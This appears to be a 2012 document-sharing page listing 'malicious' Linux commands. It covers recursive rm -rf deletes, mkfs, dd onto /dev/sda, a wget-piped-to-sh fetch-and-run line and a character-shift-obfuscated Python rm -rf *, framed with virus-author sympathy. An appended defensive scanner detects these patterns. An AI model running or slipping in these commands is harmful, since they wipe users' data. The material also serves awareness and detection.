
Black Book - Malicious Linux Command

Black Book - malicious linux command , Virus for Linux , how to make linux virus , how to make linux trojan , Linux Viruses , Linux Virus , Virus for Linux , Linux Virus source code ,

Uploaded by

vxwall
Copyright
© Attribution Non-Commercial (BY-NC)


Black Book malicious linux command by Branko D Tomic / Luxilius November 2012

Introduction
Insider: It is worthwhile to have some basic awareness of malicious commands in Linux. Today any provider in any country can spy on your private online web surfing. The online war for freedom never stops, and in that sense the virus author cannot be found guilty. The revolution against manipulation then gives you some thoughts on how to "create a virus". When in doubt as to the safety of a recommended procedure or command, it is best to verify the command's function from several sources, such as readily available documentation on Linux commands (e.g. manpages). Here are some common examples of commands that should raise a warning flag. Remember that these can always be disguised as some obfuscated command or as part of a long procedure, so the bottom line is to take appropriate caution when executing something.

Delete all files, delete current directory, or delete visible files in current directory

It's quite obvious why these commands can be sweet for a virus author to execute. rm means remove, -f means "force" deletion (even if write protected), and -r means do it recursively, i.e. all subfolders. Therefore, "rm -rf /" means force a deletion of everything in the root directory and all subfolders. "rm -rf ." means to force deletion of the current directory and all subfolders. "rm -rf *" means to force deletion of all files in the current folder and all subfolders.

rm -rf /
rm -rf .
rm -rf *

Another variation of this, which would also force deletion of the current folder and all subfolders, would be:
rm -r .[^.]*

which will only exclude the parent directory ".."

Reformat Data on device

Whatever follows the mkfs command will be destroyed and replaced with a blank filesystem.

mkfs
mkfs.ext4
mkfs.anything

Block device manipulation

These commands cause raw data to be written to a block device. Often this will clobber the filesystem and cause total loss of data:

any_command > /dev/sda
dd if=something of=/dev/sda

Malicious code in Shell scripts

Someone makes a shell script (executable from the command line interface using the script execution command ./ ), gives you the link, and recommends that you download and execute it. The script might contain any command whatsoever, whether benign or malevolent. Examples:

wget http://some_place/some_file
sh ./some_file

or

wget http://some_place/some_file -O- | sh

Malicious source code to be compiled then executed

Monstrous example (in Python):
python -c 'import os; os.system("".join([chr(ord(i)-1) for i in "sn!.sg!+"]))'

in which "sn!.sg!+" is simply the rm -rf * command shifted a character up in order to disguise it from casual examination. I wouldn't expect anyone with experience in Python to be foolish enough to paste this monstrous thing into their terminal without suspecting something might be wrong, but how many casual users are fluent in Python?
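
A defender-side check for the command families listed above, as an added example that is not part of the original document: it flags those patterns in text someone recommends you paste, and statically decodes the character-shift disguise without running anything. The rule names, regexes and function names are this example's own assumptions.

```python
import re

# Rule names and regexes are this example's own; they cover only the
# command families listed on this page, not every destructive command.
RULES = [
    ("recursive delete",
     re.compile(r"\brm\s+-[a-zA-Z]*r[a-zA-Z]*\s+(/|\.|\*|\.\[\^\.\]\*)(?=\s|$)")),
    ("filesystem creation (mkfs)", re.compile(r"\bmkfs(\.\w+)?(\s|$)")),
    # Device prefixes other than sd (as in /dev/sda) are an assumption.
    ("raw write to block device",
     re.compile(r"(>\s*|\bof=)/dev/(sd|hd|vd|nvme|mmcblk)\w+")),
    # The page shows wget; curl is added as the common equivalent.
    ("download piped into a shell",
     re.compile(r"\b(wget|curl)\b[^|;]*\|\s*(ba)?sh\b")),
]

# Matches the disguise used in the one-liner: chr(ord(i)-1) for i in "..."
SHIFT = re.compile(
    r"chr\(\s*ord\(\s*(\w+)\s*\)\s*([+-])\s*(\d+)\s*\)\s+for\s+\1\s+in\s+([\"'])(.*?)\4")

def decode_shifted(text):
    """Statically undo chr(ord(c)+/-N) string shifts; nothing is executed."""
    decoded = []
    for m in SHIFT.finditer(text):
        delta = int(m.group(3)) * (1 if m.group(2) == "+" else -1)
        decoded.append("".join(chr((ord(c) + delta) % 0x110000) for c in m.group(5)))
    return decoded

def scan(text):
    """Return sorted rule names hit by the text or by any decoded hidden string."""
    layers = [("", text)] + [(" (hidden by character shift)", d)
                             for d in decode_shifted(text)]
    return sorted({name + suffix
                   for suffix, layer in layers
                   for name, rx in RULES if rx.search(layer)})

# Constructed sample input: commands quoted from this page plus one benign line.
ONE_LINER = "python -c 'import os; os.system(\"\".join([chr(ord(i)-1) for i in \"sn!.sg!+\"]))'"
SAMPLES = [ONE_LINER, "rm -r .[^.]*", "dd if=something of=/dev/sda",
           "wget http://some_place/some_file -O- | sh", "rm -rf /home/user/tmp"]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(scan(sample) or ["no rule matched"], "<-", sample)
```

A clean result only means none of these few patterns matched; it does not show that a command is safe.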
